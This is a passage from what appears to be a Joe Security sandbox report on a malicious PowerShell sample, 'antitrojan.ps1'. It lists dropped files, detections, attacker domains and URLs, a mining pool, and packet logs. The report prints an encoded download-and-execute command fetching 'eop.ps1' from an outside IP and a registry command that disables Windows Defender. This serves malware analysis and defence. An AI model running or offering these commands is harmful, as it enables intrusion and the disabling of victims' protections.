SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwB lAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADgANQAuADEAMgA4AC4AN AAzAC4ANgAyAC8AZQBvAHAALgBwAHMAMQAnACkAKQAKAA== MD5: 92F44E405DB16AC55D97E3BFE3B132FA) reg.exe (PID: 2212 cmdline: 'C:\Windows\system32\reg.exe' add 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender' /v Disable AntiSpyware /t REG_DWORD /d 1 /f MD5: D69A9ABBB0D795F21995C2F48C1EB560) cleanup

Created / dropped Files

C:\Users\user\AppData\Local\Temp\06trmcfr.0.cs Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File Type: UTF-8 Unicode (with BOM) text, with CRLF line terminators Size (bytes): 5736 Entropy (8bit): 4.918671436686815 Encrypted: false MD5: B429ACD06F2B7ECFBA004B883016110A SHA1: 27C513D4FED6AC4850DAB34CA960D326C00685E1 SHA-256: 0F10EA6C49F7FC90B718CC58763D770ED936ABF5DA4E0E49CFC040FF094D3F8D

Copyright Joe Security LLC 2018 Page 16 of 50 C:\Users\user\AppData\Local\Temp\06trmcfr.0.cs SHA-512: 5FAB4436371F25DFA8880393CDCEC61B60A86294C64B689D4056D8B0E501B94C6049979D7A67FEE46A9241746BB C60437E5CB522088072AB92D01DF34B94BE37 Malicious: false

C:\Users\user\AppData\Local\Temp\06trmcfr.cmdline Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File Type: UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators Size (bytes): 327 Entropy (8bit): 5.282860721087337 Encrypted: false MD5: 99F5EC56911797D838189952D9845B88 SHA1: B9ACE541052AF074E4579A427D60703720AF4977 SHA-256: 8BE857D417E7CFC49A35BE10645B3F5F9E56BFD28823FCB0051B791E73240EB5 SHA-512: 63696A92E8F6EE2294F50659CECF26BC4706FBF90E0A4B4D73BC9C4214C64CC8110D3C4C01D4B11859C7E5F6C0 100E24E13CC6A203A9099628643DEEA70EBC31 Malicious: false

C:\Users\user\AppData\Local\Temp\06trmcfr.out Process: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe File Type: ASCII text, with CRLF line terminators Size (bytes): 352 Entropy (8bit): 5.108980129063329 Encrypted: false MD5: 329D4CF1BD50F6427D1F9E05E5DEBED5 SHA1: 749F8A60371DFFABA04FD658DD1762FE163903DA SHA-256: 855725E6683359B3B40ACE1A5C3014652B80A6D4950EB5A9D5DE084313BE00D5 SHA-512: B9E458F41C7D746788FA14F5213BA11B6BC3063D99AC75DCCBC615DF07BFBD295A1BE7ED1646C25299DDD3C2F FFE59C29BEE1FA9BB2F15E4380EEDAD795C7197 Malicious: false

C:\Users\user\AppData\Local\Temp\cohernece.exe

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File Type: PE32 executable (GUI) Intel 80386, for MS Windows Size (bytes): 1827440 Entropy (8bit): 7.823071696531818 Encrypted: false MD5: 4FE2DE6FBB278E56C23E90432F21F6C8 SHA1: 3D7C17595E687FFD7DD9506DC5EB59860D44B115 SHA-256: F90BCF5B649EBB61D1B2A1A973C04312E3E72A71D4393CCBB12B9FA593637D62 SHA-512: 908AA98AC0FAC00D361627893D01C8551C9B0E4A4242874919B29D7744A09AF91FC92C26F20BC2A7C25C50B8315 26633D30D855853597D693079BF73077D7292 Malicious: true Antivirus: Antivirus: Avira, Detection: 100%, Browse Antivirus: virustotal, Detection: 74%, Browse

C:\Users\user\AppData\Local\Temp\i1bjouxb.0.cs Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File Type: UTF-8 Unicode (with BOM) text, with CRLF line terminators Size (bytes): 5736 Entropy (8bit): 4.918671436686815 Encrypted: false MD5: B429ACD06F2B7ECFBA004B883016110A SHA1: 27C513D4FED6AC4850DAB34CA960D326C00685E1 SHA-256: 0F10EA6C49F7FC90B718CC58763D770ED936ABF5DA4E0E49CFC040FF094D3F8D SHA-512: 5FAB4436371F25DFA8880393CDCEC61B60A86294C64B689D4056D8B0E501B94C6049979D7A67FEE46A9241746BB C60437E5CB522088072AB92D01DF34B94BE37 Malicious: false

C:\Users\user\AppData\Local\Temp\i1bjouxb.cmdline Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File Type: UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators Size (bytes): 327 Entropy (8bit): 5.321764775012278 Encrypted: false MD5: F8B845F350B7B33792706BC6D14D7D46 SHA1: BFC0111C304A823683D1FA1E9FC7B3153FFD903B

Copyright Joe Security LLC 2018 Page 17 of 50 C:\Users\user\AppData\Local\Temp\i1bjouxb.cmdline SHA-256: 0165702BED18CA0DEB8415A13495B28FD81B5F27F558512CAC182EB70EC32308 SHA-512: 606EE30B6FFD19728E99C7777120AEB755DF0B495B3F1369BD43A8BE7FC9482828CC8352A51CB48BD828ACEDEF 2CD6857CF56AF3C0182ECBBA0BD7B8CB84184D Malicious: false

C:\Users\user\AppData\Local\Temp\i1bjouxb.out Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File Type: UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators Size (bytes): 422 Entropy (8bit): 5.4335381582015545 Encrypted: false MD5: A7F51B6AD9989E2417946B2F6D79F817 SHA1: 200355CEB526740C833FE3F1003A26D2F8B053D4 SHA-256: C15631614BEAA238642C3419CC053291B45093A1BCB52B8194FCECD045D61ACB SHA-512: 0EBF551CB622AF6735A3A703897F93C508995DEC1CE8C2F8AF35B142E72FB97A1E13AF3A080494BB8993A97F09D BE3F3FFAD94F6051B8B8649B6EF4FD693B6EA Malicious: false

C:\Users\user\AppData\Local\Temp\java-log-9527.log

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File Type: PE32 executable (GUI) Intel 80386, for MS Windows Size (bytes): 22528 Entropy (8bit): 6.196024156080477 Encrypted: false MD5: 71404815F6A0171A29DE46846E78A079 SHA1: 9BDDFC549FED13AF5F3F40A1CF91CDD26134884F SHA-256: A467974C13CBEE341C08FD0A51C28BF7CC7E482FF078A9D0ED96371B2CED5D95 SHA-512: F1B25991A8BB2AB1D86DD2CE00364F535897EB9508A2CD3D6EFD1BD17F0502BCA0F3DA72110F2C80B815912AD1 0FBB7F82D3091EA754253DA111078B943C7C00 Malicious: true Yara Hits: Rule: ZxShell_Related_Malware_CN_Group_Jul17_2, Description: Detects a ZxShell related sample from a CN threat group, Source: C:\Users\user\AppData\Local\Temp\java-log-9527.log, Author: Florian Roth Rule: Backdoor_Nitol_Jun17, Description: Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader, Source: C:\Users\user\AppData\Local\Temp\java-log-9527.log, Author: Florian Roth Rule: CN_disclosed_20180208_Mal1, Description: Detects malware from disclosed CN malware set, Source: C:\Users\user\AppData\Local\Temp\java-log-9527.log, Author: Florian Roth

Antivirus: Antivirus: Avira, Detection: 100%, Browse Antivirus: virustotal, Detection: 82%, Browse Antivirus: metadefender, Detection: 66%, Browse

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\43PJU0Q7P684BJ9TEKCZ.temp Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File Type: data Size (bytes): 8016 Entropy (8bit): 3.566225737430372 Encrypted: false MD5: 72DFB324B263B999DD200B1665FDC533 SHA1: 270A65271ADBEC16E64F6FB8D0D59C0567236B0B SHA-256: C20441DB77CF0CEE0A6130165BBE94B190BD10416D1576F1D483C7D19FF14E88 SHA-512: 72FA96CB9DBA0508D287879D6608F98A6AC89C2356675A1066563936B100550C11ED7398EBC6505504E3EB0FC267 5DF20CFF97EDED02C01BE8BCBB1D3F05E878 Malicious: false

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Y2JIYX88BPRCWM2IERRJ.temp Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File Type: data Size (bytes): 8016 Entropy (8bit): 3.566225737430372 Encrypted: false MD5: 72DFB324B263B999DD200B1665FDC533 SHA1: 270A65271ADBEC16E64F6FB8D0D59C0567236B0B SHA-256: C20441DB77CF0CEE0A6130165BBE94B190BD10416D1576F1D483C7D19FF14E88 SHA-512: 72FA96CB9DBA0508D287879D6608F98A6AC89C2356675A1066563936B100550C11ED7398EBC6505504E3EB0FC267 5DF20CFF97EDED02C01BE8BCBB1D3F05E878 Malicious: false

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\antivirus[1].php Process: C:\Windows\System32\regsvr32.exe

Copyright Joe Security LLC 2018 Page 18 of 50 C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\antivirus[1].php File Type: XML document, ASCII text, with CRLF line terminators Size (bytes): 635 Entropy (8bit): 5.34168641203373 Encrypted: false MD5: A182AE48D664AAE7D246DFE877BAE7B4 SHA1: F05A17521DAC72882A9ECC615E24ADE48230907E SHA-256: 725D4647C0F74485EE2640F03EAC599E35F046C2E6EBA57DADB33B8E4C39F143 SHA-512: 180AE9BF7DAF56C7743E4D42DF66A6537623F0343D12CFA041D9808E44E2B30634D06B1AD74388C732619206660B 7AB6F44CEE0371AAA006DFED69E3E7CB29F9 Malicious: false Yara Hits: Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\antivirus[1].php, Author: Florian Roth

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\antivirus[2].php Process: C:\Windows\System32\regsvr32.exe File Type: XML document, ASCII text, with CRLF line terminators Size (bytes): 635 Entropy (8bit): 5.34168641203373 Encrypted: false MD5: A182AE48D664AAE7D246DFE877BAE7B4 SHA1: F05A17521DAC72882A9ECC615E24ADE48230907E SHA-256: 725D4647C0F74485EE2640F03EAC599E35F046C2E6EBA57DADB33B8E4C39F143 SHA-512: 180AE9BF7DAF56C7743E4D42DF66A6537623F0343D12CFA041D9808E44E2B30634D06B1AD74388C732619206660B 7AB6F44CEE0371AAA006DFED69E3E7CB29F9 Malicious: false Yara Hits: Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\antivirus[2].php, Author: Florian Roth

stdout Process: C:\Windows\System32\NETSTAT.EXE File Type: ASCII text, with CRLF line terminators Size (bytes): 855 Entropy (8bit): 3.5554528682381954 Encrypted: false MD5: A112A67374EAFF9D037F9ABFB5676454 SHA1: AF91E74410BB99E89B68BD845E3FFDE891404C68 SHA-256: 27B2773DACA4DE74F63D3D59A813FCF50B5A5EB8449AEA1EE83484C732DBC0C6 SHA-512: 4A2F3120AA99A53FCCC5DC3CEF523C52EC26D8D7E514EDE74ECAA88085713C50279B2D0B7CBC7A9D31FA00094 404CBEAC1BDF4924565BB2EFD0809388F2ACF44 Malicious: false

Domains and IPs

Contacted Domains

Name IP Active Malicious Antivirus Detection Reputation f4keu.7h4uk.com 185.128.43.58 true true 7%, virustotal, Browse unknown update.7h4uk.com 185.128.43.62 true false high xmr-eu1.nanopool.org 51.15.58.224 true false high

Contacted URLs

Name Malicious Antivirus Detection Reputation https://update.7h4uk.com:443/logos.png true Avira URL Cloud: safe unknown http://185.128.43.62/eop.ps1 true 12%, virustotal, Browse unknown Avira URL Cloud: malware https://update.7h4uk.com:443/antivirus.php true Avira URL Cloud: safe unknown https://update.7h4uk.com:443/ver.txt true Avira URL Cloud: safe unknown https://update.7h4uk.com:443/cohernece.txt true Avira URL Cloud: safe unknown

URLs from Memory and Binaries

Copyright Joe Security LLC 2018 Page 19 of 50 Name Source Malicious Antivirus Detection Reputation http://update.7h4uk.( schtasks.exe, 0000000B.0000000 false Avira URL Cloud: safe low 2.1652004549.0021A000.00000004 .sdmp https://certs.starfieldtech.com/repository/0 cohernece.exe.1.dr false high http://certificates.godaddy.com/repository/0 cohernece.exe.1.dr false high http://certs.starfieldtech.com/repository/1402 cohernece.exe.1.dr false high http://crl.starfieldtech.com/sfroot-g2.crl0L cohernece.exe.1.dr false high http://certs.godaddy.com/repository/1301 cohernece.exe.1.dr false high http://185.128.43.62 powershell.exe, 00000019.00000 true 9%, virustotal, Browse unknown 002.1978838057.00E60000.000000 Avira URL Cloud: safe 04.sdmp, powershell.exe, 00000 01C.00000002.1973570283.00DC00 00.00000004.sdmp http://crl.starf cohernece.exe, 00000020.000000 false Avira URL Cloud: safe unknown 02.1898207923.0012D000.0000000 4.sdmp http://ocsp.starfieldtech.com/0; cohernece.exe.1.dr false high http://crl.godaddy.com/gdig2s5-2.crl0 cohernece.exe.1.dr false high http://185.128.43.62/eop.ps1t powershell.exe, 00000019.00000 true Avira URL Cloud: safe unknown 002.1978838057.00E60000.000000 04.sdmp, powershell.exe, 00000 01C.00000002.1973570283.00DC00 00.00000004.sdmp https://certs.godaddy.com/repository/0 cohernece.exe.1.dr false high http://update.7h4uk.com:443/cohernece.txt powershell.exe, 00000001.00000 false Avira URL Cloud: safe unknown 003.1721698658.026B6000.000000 04.sdmp http://crl.godaddy.com/gdroot-g2.crl0F cohernece.exe.1.dr false high http://ocsp.starfieldtech.com/0H cohernece.exe.1.dr false high http://$nic/antitrojan.ps1t powershell.exe, 00000019.00000 true Avira URL Cloud: safe low 002.1979485760.0106B000.000000 04.sdmp, powershell.exe, 00000 01C.00000002.1979251410.00FCB0 00.00000004.sdmp http://crl.starfieldtech.com/repository/0 cohernece.exe.1.dr false high http://crl.starfieldtech.com/repository/masterstarfield2issu cohernece.exe.1.dr false high ing.crl0P http://$nic/antivirus.ps1t powershell.exe, 00000019.00000 false Avira URL Cloud: safe low 002.1979485760.0106B000.000000 04.sdmp, powershell.exe, 00000 01C.00000002.1979251410.00FCB0 00.00000004.sdmp http://crl.godaddy.com/gdroot.crl0F cohernece.exe.1.dr false high http://nic/antivirus.ps1Tn powershell.exe, 00000019.00000 false Avira URL Cloud: safe low 002.2070818367.012A9000.000000 04.sdmp http://$nic/antitrojan.ps1 powershell.exe, 0000001C.00000 true Avira URL Cloud: safe low 002.1993866139.011AA000.000000 04.sdmp http://crl.starfieldtech.com/repository/sf_issuing_ca-g2.crt0T cohernece.exe.1.dr false high http://$nic/antivirus.ps1 powershell.exe, 0000001C.00000 false Avira URL Cloud: safe low 002.1993866139.011AA000.000000 04.sdmp http://update.7h4uk.com:443/antivirus.php schtasks.exe, 0000000C.0000000 true 10%, virustotal, Browse unknown 2.1653473899.003E0000.00000004 Avira URL Cloud: malware .sdmp, schtasks.exe, 0000000C. 00000002.1653311364.001A0000.0 0000004.sdmp http://certificates.godaddy.com/repository/gdig2.crt0 cohernece.exe.1.dr false high http://nic/antivirus.ps1T powershell.exe, 0000001C.00000 false Avira URL Cloud: safe low 002.1993866139.011AA000.000000 04.sdmp http://nic/antitrojan.ps1T powershell.exe, 00000019.00000 true Avira URL Cloud: safe low 002.2070818367.012A9000.000000 04.sdmp, powershell.exe, 00000 01C.00000002.1993866139.011AA0 00.00000004.sdmp http://update.7h4uk. schtasks.exe, 0000000C.0000000 true Avira URL Cloud: safe low 2.1652658525.0007A000.00000004 .sdmp

Contacted IPs

Copyright Joe Security LLC 2018 Page 20 of 50 No. of IPs < 25% 25% < No. of IPs < 50% 50% < No. of IPs < 75%

75% < No. of IPs

Public

IP Country Flag ASN ASN Name Malicious 185.128.43.62 Switzerland 60392 ASRACKENDCH false

Private

IP 192.168.2.39 192.168.2.38 192.168.2.42 192.168.2.148 192.168.2.41 192.168.2.149 192.168.2.44 192.168.2.146 192.168.2.43 192.168.2.147 192.168.2.46 192.168.2.45 192.168.2.48 192.168.2.47 192.168.2.140 192.168.2.141 192.168.2.144 192.168.2.145 192.168.2.40 192.168.2.142 192.168.2.143 192.168.2.28 192.168.2.27 192.168.2.29 192.168.2.31 192.168.2.159 192.168.2.30 192.168.2.33 192.168.2.157 192.168.2.32 192.168.2.158 Copyright Joe Security LLC 2018 Page 21 of 50 IP 192.168.2.35 192.168.2.34 192.168.2.37 192.168.2.36 192.168.2.151 192.168.2.152 192.168.2.150 192.168.2.155 192.168.2.156 192.168.2.153 192.168.2.154 192.168.2.17 192.168.2.16 192.168.2.19 192.168.2.18 192.168.2.20 192.168.2.126 192.168.2.127 192.168.2.22 192.168.2.124 192.168.2.21 192.168.2.125 192.168.2.24 192.168.2.23 192.168.2.26 192.168.2.128 192.168.2.25 192.168.2.129 192.168.2.122 192.168.2.123 192.168.2.120 192.168.2.121 192.168.2.97 192.168.2.137 192.168.2.96 192.168.2.138 192.168.2.11 192.168.2.99 192.168.2.135 192.168.2.10 192.168.2.98 192.168.2.136 192.168.2.13 192.168.2.12 192.168.2.15 192.168.2.139 192.168.2.14 192.168.2.130 192.168.2.91 192.168.2.90 192.168.2.93 192.168.2.133 192.168.2.92 192.168.2.134 192.168.2.95 192.168.2.131 192.168.2.94 192.168.2.132 192.168.2.1 192.168.2.8 192.168.2.7 192.168.2.9 192.168.2.4 192.168.2.3

Copyright Joe Security LLC 2018 Page 22 of 50 IP 192.168.2.6 192.168.2.5 192.168.2.86 192.168.2.104

Static File Info

General

File type: ASCII text, with very long lines, with no line terminators Entropy (8bit): 5.6445849091681675 TrID: File name: antitrojan.ps1 File size: 2056945 MD5: 33347699f9845a17ae84f1e75fe4f636 SHA1: 390d236b3ba304a432ee4f9647cc7013c6efcf09 SHA256: b4e55517ba1268e9a5efaaaecb71ad683932caa75819fdf 5f82f3bb37061e145 SHA512: 067ccbac6f932d9480ddc0b3e6e26c0befd1b41f8e6c6a8 a0d12d99951ec9ecd0ec8795f2bfbe496e923a82755f8bd fe2c390376c2265437c60c182834b54b7f File Content Preview: $miiiiii="TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAIAEAAA4fug4AtAnNIbgBTM0hVGhpcyB wcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v ZGUuDQ0KJAAAAAAAAACLwQPuz6Btvc+gbb3PoG29 ezycvcWgbb17PJ69WqBtvXs8n73WoG299P5uvNigbb3 0/mi82aBtv

File Icon

Network Behavior

Network Port Distribution

Total Packets: 50 • 443 (HTTPS) • 53 (DNS)

TCP Packets

Timestamp Source Port Dest Port Source IP Dest IP Sep 4, 2018 05:06:04.007205009 CEST 56842 53 192.168.2.2 8.8.8.8 Sep 4, 2018 05:06:04.035728931 CEST 53 56842 8.8.8.8 192.168.2.2

Copyright Joe Security LLC 2018 Page 23 of 50 Timestamp Source Port Dest Port Source IP Dest IP Sep 4, 2018 05:06:04.068552971 CEST 53440 53 192.168.2.2 8.8.8.8 Sep 4, 2018 05:06:04.110846043 CEST 53 53440 8.8.8.8 192.168.2.2 Sep 4, 2018 05:06:04.134479046 CEST 59605 53 192.168.2.2 8.8.8.8 Sep 4, 2018 05:06:04.181596041 CEST 53 59605 8.8.8.8 192.168.2.2 Sep 4, 2018 05:06:04.203902006 CEST 50900 53 192.168.2.2 8.8.8.8 Sep 4, 2018 05:06:04.216890097 CEST 53 50900 8.8.8.8 192.168.2.2 Sep 4, 2018 05:06:36.210169077 CEST 51075 53 192.168.2.2 8.8.8.8 Sep 4, 2018 05:06:36.247931004 CEST 53 51075 8.8.8.8 192.168.2.2 Sep 4, 2018 05:06:36.280410051 CEST 61674 53 192.168.2.2 8.8.8.8 Sep 4, 2018 05:06:36.293931961 CEST 53 61674 8.8.8.8 192.168.2.2 Sep 4, 2018 05:06:36.322196960 CEST 59291 53 192.168.2.2 8.8.8.8 Sep 4, 2018 05:06:36.349576950 CEST 53 59291 8.8.8.8 192.168.2.2 Sep 4, 2018 05:06:36.375962973 CEST 63053 53 192.168.2.2 8.8.8.8 Sep 4, 2018 05:06:36.403438091 CEST 53 63053 8.8.8.8 192.168.2.2 Sep 4, 2018 05:06:36.936928034 CEST 60812 53 192.168.2.2 8.8.8.8 Sep 4, 2018 05:06:36.950007915 CEST 53 60812 8.8.8.8 192.168.2.2 Sep 4, 2018 05:06:36.973893881 CEST 49161 443 192.168.2.2 185.128.43.62 Sep 4, 2018 05:06:36.987097025 CEST 443 49161 185.128.43.62 192.168.2.2 Sep 4, 2018 05:06:36.987159967 CEST 49161 443 192.168.2.2 185.128.43.62 Sep 4, 2018 05:06:36.987550020 CEST 49161 443 192.168.2.2 185.128.43.62 Sep 4, 2018 05:06:37.000843048 CEST 443 49161 185.128.43.62 192.168.2.2 Sep 4, 2018 05:06:37.001055956 CEST 443 49161 185.128.43.62 192.168.2.2 Sep 4, 2018 05:06:37.001085997 CEST 443 49161 185.128.43.62 192.168.2.2 Sep 4, 2018 05:06:37.001183033 CEST 49161 443 192.168.2.2 185.128.43.62 Sep 4, 2018 05:06:37.002031088 CEST 49161 443 192.168.2.2 185.128.43.62 Sep 4, 2018 05:06:37.015224934 CEST 443 49161 185.128.43.62 192.168.2.2 Sep 4, 2018 05:06:45.052798033 CEST 58523 53 192.168.2.2 8.8.8.8 Sep 4, 2018 05:06:45.065839052 CEST 53 58523 8.8.8.8 192.168.2.2 Sep 4, 2018 05:06:45.079092026 CEST 49162 443 192.168.2.2 185.128.43.62 Sep 4, 2018 05:06:45.092384100 CEST 443 49162 185.128.43.62 192.168.2.2 Sep 4, 2018 05:06:45.092472076 CEST 49162 443 192.168.2.2 185.128.43.62 Sep 4, 2018 05:06:45.093209028 CEST 49162 443 192.168.2.2 185.128.43.62 Sep 4, 2018 05:06:45.106537104 CEST 443 49162 185.128.43.62 192.168.2.2 Sep 4, 2018 05:06:45.106734991 CEST 443 49162 185.128.43.62 192.168.2.2 Sep 4, 2018 05:06:45.106764078 CEST 443 49162 185.128.43.62 192.168.2.2 Sep 4, 2018 05:06:45.106859922 CEST 49162 443 192.168.2.2 185.128.43.62 Sep 4, 2018 05:06:45.107306957 CEST 49162 443 192.168.2.2 185.128.43.62 Sep 4, 2018 05:06:45.124243975 CEST 443 49162 185.128.43.62 192.168.2.2 Sep 4, 2018 05:06:45.297699928 CEST 49163 443 192.168.2.2 185.128.43.62 Sep 4, 2018 05:06:45.311093092 CEST 443 49163 185.128.43.62 192.168.2.2 Sep 4, 2018 05:06:45.311182022 CEST 49163 443 192.168.2.2 185.128.43.62 Sep 4, 2018 05:06:45.311439037 CEST 49163 443 192.168.2.2 185.128.43.62 Sep 4, 2018 05:06:45.324865103 CEST 443 49163 185.128.43.62 192.168.2.2 Sep 4, 2018 05:06:45.325161934 CEST 443 49163 185.128.43.62 192.168.2.2 Sep 4, 2018 05:06:45.325201988 CEST 443 49163 185.128.43.62 192.168.2.2 Sep 4, 2018 05:06:45.325227976 CEST 443 49163 185.128.43.62 192.168.2.2 Sep 4, 2018 05:06:45.325247049 CEST 49163 443 192.168.2.2 185.128.43.62 Sep 4, 2018 05:06:45.325432062 CEST 443 49163 185.128.43.62 192.168.2.2 Sep 4, 2018 05:06:45.325458050 CEST 443 49163 185.128.43.62 192.168.2.2 Sep 4, 2018 05:06:45.325473070 CEST 49163 443 192.168.2.2 185.128.43.62 Sep 4, 2018 05:06:45.325480938 CEST 443 49163 185.128.43.62 192.168.2.2 Sep 4, 2018 05:06:45.325504065 CEST 443 49163 185.128.43.62 192.168.2.2 Sep 4, 2018 05:06:45.325526953 CEST 443 49163 185.128.43.62 192.168.2.2 Sep 4, 2018 05:06:45.325552940 CEST 443 49163 185.128.43.62 192.168.2.2 Sep 4, 2018 05:06:45.325567007 CEST 49163 443 192.168.2.2 185.128.43.62 Sep 4, 2018 05:06:45.325576067 CEST 443 49163 185.128.43.62 192.168.2.2 Sep 4, 2018 05:06:45.325752974 CEST 49163 443 192.168.2.2 185.128.43.62 Sep 4, 2018 05:06:45.338663101 CEST 443 49163 185.128.43.62 192.168.2.2 Sep 4, 2018 05:06:45.338766098 CEST 443 49163 185.128.43.62 192.168.2.2 Sep 4, 2018 05:06:45.338808060 CEST 443 49163 185.128.43.62 192.168.2.2 Sep 4, 2018 05:06:45.338838100 CEST 49163 443 192.168.2.2 185.128.43.62 Sep 4, 2018 05:06:45.338916063 CEST 443 49163 185.128.43.62 192.168.2.2 Sep 4, 2018 05:06:45.338941097 CEST 443 49163 185.128.43.62 192.168.2.2 Sep 4, 2018 05:06:45.339003086 CEST 49163 443 192.168.2.2 185.128.43.62

Copyright Joe Security LLC 2018 Page 24 of 50 Timestamp Source Port Dest Port Source IP Dest IP Sep 4, 2018 05:06:45.339080095 CEST 443 49163 185.128.43.62 192.168.2.2 Sep 4, 2018 05:06:45.339104891 CEST 443 49163 185.128.43.62 192.168.2.2 Sep 4, 2018 05:06:45.339128017 CEST 443 49163 185.128.43.62 192.168.2.2 Sep 4, 2018 05:06:45.339150906 CEST 443 49163 185.128.43.62 192.168.2.2 Sep 4, 2018 05:06:45.339174032 CEST 443 49163 185.128.43.62 192.168.2.2 Sep 4, 2018 05:06:45.339189053 CEST 49163 443 192.168.2.2 185.128.43.62 Sep 4, 2018 05:06:45.339196920 CEST 443 49163 185.128.43.62 192.168.2.2 Sep 4, 2018 05:06:45.339220047 CEST 443 49163 185.128.43.62 192.168.2.2 Sep 4, 2018 05:06:45.339242935 CEST 443 49163 185.128.43.62 192.168.2.2 Sep 4, 2018 05:06:45.339292049 CEST 49163 443 192.168.2.2 185.128.43.62 Sep 4, 2018 05:06:45.341588020 CEST 49163 443 192.168.2.2 185.128.43.62 Sep 4, 2018 05:06:45.352560997 CEST 443 49163 185.128.43.62 192.168.2.2 Sep 4, 2018 05:06:45.352638006 CEST 443 49163 185.128.43.62 192.168.2.2 Sep 4, 2018 05:06:45.352678061 CEST 443 49163 185.128.43.62 192.168.2.2 Sep 4, 2018 05:06:45.352715015 CEST 443 49163 185.128.43.62 192.168.2.2 Sep 4, 2018 05:06:45.352745056 CEST 49163 443 192.168.2.2 185.128.43.62 Sep 4, 2018 05:06:45.352756977 CEST 443 49163 185.128.43.62 192.168.2.2 Sep 4, 2018 05:06:45.352785110 CEST 443 49163 185.128.43.62 192.168.2.2 Sep 4, 2018 05:06:45.352807999 CEST 443 49163 185.128.43.62 192.168.2.2 Sep 4, 2018 05:06:45.352812052 CEST 49163 443 192.168.2.2 185.128.43.62 Sep 4, 2018 05:06:45.352830887 CEST 443 49163 185.128.43.62 192.168.2.2 Sep 4, 2018 05:06:45.352888107 CEST 49163 443 192.168.2.2 185.128.43.62 Sep 4, 2018 05:06:45.352971077 CEST 443 49163 185.128.43.62 192.168.2.2 Sep 4, 2018 05:06:45.352996111 CEST 443 49163 185.128.43.62 192.168.2.2 Sep 4, 2018 05:06:45.353018999 CEST 443 49163 185.128.43.62 192.168.2.2 Sep 4, 2018 05:06:45.353041887 CEST 443 49163 185.128.43.62 192.168.2.2 Sep 4, 2018 05:06:45.353065014 CEST 443 49163 185.128.43.62 192.168.2.2 Sep 4, 2018 05:06:45.353070021 CEST 49163 443 192.168.2.2 185.128.43.62 Sep 4, 2018 05:06:45.353094101 CEST 443 49163 185.128.43.62 192.168.2.2 Sep 4, 2018 05:06:45.353117943 CEST 443 49163 185.128.43.62 192.168.2.2 Sep 4, 2018 05:06:45.353141069 CEST 443 49163 185.128.43.62 192.168.2.2 Sep 4, 2018 05:06:45.353154898 CEST 49163 443 192.168.2.2 185.128.43.62 Sep 4, 2018 05:06:45.353163004 CEST 443 49163 185.128.43.62 192.168.2.2 Sep 4, 2018 05:06:45.353185892 CEST 443 49163 185.128.43.62 192.168.2.2

UDP Packets

Timestamp Source Port Dest Port Source IP Dest IP Sep 4, 2018 05:06:04.007205009 CEST 56842 53 192.168.2.2 8.8.8.8 Sep 4, 2018 05:06:04.035728931 CEST 53 56842 8.8.8.8 192.168.2.2 Sep 4, 2018 05:06:04.068552971 CEST 53440 53 192.168.2.2 8.8.8.8 Sep 4, 2018 05:06:04.110846043 CEST 53 53440 8.8.8.8 192.168.2.2 Sep 4, 2018 05:06:04.134479046 CEST 59605 53 192.168.2.2 8.8.8.8 Sep 4, 2018 05:06:04.181596041 CEST 53 59605 8.8.8.8 192.168.2.2 Sep 4, 2018 05:06:04.203902006 CEST 50900 53 192.168.2.2 8.8.8.8 Sep 4, 2018 05:06:04.216890097 CEST 53 50900 8.8.8.8 192.168.2.2 Sep 4, 2018 05:06:36.210169077 CEST 51075 53 192.168.2.2 8.8.8.8 Sep 4, 2018 05:06:36.247931004 CEST 53 51075 8.8.8.8 192.168.2.2 Sep 4, 2018 05:06:36.280410051 CEST 61674 53 192.168.2.2 8.8.8.8 Sep 4, 2018 05:06:36.293931961 CEST 53 61674 8.8.8.8 192.168.2.2 Sep 4, 2018 05:06:36.322196960 CEST 59291 53 192.168.2.2 8.8.8.8 Sep 4, 2018 05:06:36.349576950 CEST 53 59291 8.8.8.8 192.168.2.2 Sep 4, 2018 05:06:36.375962973 CEST 63053 53 192.168.2.2 8.8.8.8 Sep 4, 2018 05:06:36.403438091 CEST 53 63053 8.8.8.8 192.168.2.2 Sep 4, 2018 05:06:36.936928034 CEST 60812 53 192.168.2.2 8.8.8.8 Sep 4, 2018 05:06:36.950007915 CEST 53 60812 8.8.8.8 192.168.2.2 Sep 4, 2018 05:06:45.052798033 CEST 58523 53 192.168.2.2 8.8.8.8 Sep 4, 2018 05:06:45.065839052 CEST 53 58523 8.8.8.8 192.168.2.2 Sep 4, 2018 05:06:46.495673895 CEST 65490 53 192.168.2.2 8.8.8.8 Sep 4, 2018 